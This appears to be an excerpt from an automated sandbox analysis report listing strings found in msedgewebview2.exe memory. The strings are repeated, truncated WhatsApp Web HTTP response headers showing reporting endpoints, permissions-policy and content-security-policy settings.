                  Source: msedgewebview2.exe, 00000020.00000003.2393549936.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 02:17:55 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2388640801.00001B440043C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:18:00 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2388640801.00001B440043C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:18:00 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:18:00 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2388640801.00001B4400452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:application/javascript; charset=UTF-8vary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:18:00 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.
                  Source: msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 06:53:57 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagra
                  Source: msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 06:53:57 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: blob: https://*.whatsapp.net https://*.cdninstagra
                  Source: msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:21:44 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: b
                  Source: msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:21:44 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: b
                  Source: msedgewebview2.exe, 00000020.00000003.2569583294.00001B4400F44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200content-encoding:brcontent-type:image/pngvary:Accept-Encoding, Referervary:Accept-Encodingreporting-endpoints:coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.whatsapp.com/whatsapp_browser_error_reports/?device_level=unknown", permissions_policy="https://www.whatsapp.com/whatsapp_browser_error_reports/"report-to:{"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/?device_level=unknown"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.whatsapp.com\/whatsapp_browser_error_reports\/"}],"group":"permissions_policy"}document-policy:force-load-at-toppermissions-policy:accelerometer=(), ambient-light-sensor=(), autoplay=(), bluetooth=(), camera=(self), ch-device-memory=(), ch-ua-arch=(), ch-ua-bitness=(), clipboard-read=(), clipboard-write=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(self), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=(), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"cross-origin-resource-policy:cross-origincross-origin-embedder-policy-report-only:require-corp;report-to="coep_report"cross-origin-opener-policy:unsafe-none;report-to="coop_report"pragma:publiccache-control:max-age=31449600expires:Sun, 09 Mar 2025 16:39:42 +0000x-content-type-options:nosniffx-xss-protection:0content-security-policy:frame-ancestors 'self';content-security-policy:default-src 'self' data: blob:;script-src 'self' data: blob: 'unsafe-eval' 'unsafe-inline' https://static.whatsapp.net https://maps.googleapis.com https://www.youtube.com;style-src 'self' data: blob: 'unsafe-inline' https://fonts.googleapis.com https://static.whatsapp.net;connect-src 'self' data: blob: https://*.whatsapp.net https://www.facebook.com https://crashlogs.whatsapp.net/wa_clb_data https://crashlogs.whatsapp.net/wa_fls_upload_check https://*.google-analytics.com wss://*.web.whatsapp.com wss://web.whatsapp.com https://www.whatsapp.com https://dyn.web.whatsapp.com https://graph.whatsapp.com/graphql/ https://graph.facebook.com/graphql https://*.tenor.co https://*.giphy.com;font-src data: 'self' https://fonts.googleapis.com https://fonts.gstatic.com https://static.whatsapp.net;img-src 'self' data: blob: https://*.whatsapp.net https://maps.googleapis.com/maps/api/staticmap https://*.fbcdn.net *.tenor.co *.tenor.com *.giphy.com https://*.ytimg.com;media-src 'self' data: b
